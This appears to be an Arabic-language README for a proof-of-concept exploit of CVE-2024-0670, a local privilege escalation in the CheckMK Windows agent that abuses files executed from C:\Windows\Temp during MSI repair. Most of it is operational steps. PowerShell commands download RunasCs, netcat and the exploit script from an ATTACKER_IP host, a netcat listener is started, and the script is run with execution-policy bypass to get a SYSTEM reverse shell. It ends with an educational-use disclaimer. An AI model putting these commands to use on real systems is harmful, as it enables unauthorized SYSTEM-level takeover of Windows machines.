
يحتوي هذا المستودع على عرض استغلال لثغرة CVE-2024-0670، وهي ثغرة تصعيد صلاحيات محلية تؤثر على وكيل CheckMK لنظام ويندوز. تسمح الثغرة لمستخدم منخفض الصلاحيات بالحصول على صلاحيات SYSTEM من خلال إساءة استخدام مسارات ملفات قابلة للكتابة تتم معالجتها بواسطة آلية إصلاح MSI.
يحتوي هذا المستودع على إثبات مفهوم بسيط وواضح للثغرة CVE-2024-0670، وهي ثغرة تصعيد صلاحيات محلية في وكيل CheckMK لنظام Windows. يمكن لمستخدم منخفض الصلاحيات الحصول على صلاحيات SYSTEM من خلال استغلال مسارات ملفات مؤقتة قابلة للكتابة يتم تنفيذها أثناء إصلاح MSI.
أثناء إصلاح MSI، ينفذ CheckMK ملفات ضمن:
C:\Windows\Temp\
إذا تمكن مستخدم عادي من وضع ملفات هناك بأسماء يمكن توقعها، يمكنه تنفيذ أوامر بصلاحيات NT AUTHORITY\SYSTEM.
يضع هذا الاستغلال عدة أسماء ملفات حمولة ويشغّل إصلاح MSI لتحقيق التنفيذ بصلاحيات SYSTEM.
RunasCs.exe → runas replacement (plaintext password support)
nc.exe → Netcat (reverse shell)
exploit.ps1 → CVE-2024-0670 exploit script
README.md → documentation
C:\Windows\Temp\
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1
شغّل مستمعًا على جهازك:
nc -lvnp 1111
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"
في حال نجاح العملية، ستحصل على قشرة عكسية بصلاحيات SYSTEM.
net4:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
net2:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs
هذا المشروع مخصص للأغراض التعليمية واختبار الاختراق المصرح به فقط. لا تستخدمه لأغراض غير قانونية. المؤلف غير مسؤول عن أي إساءة استخدام.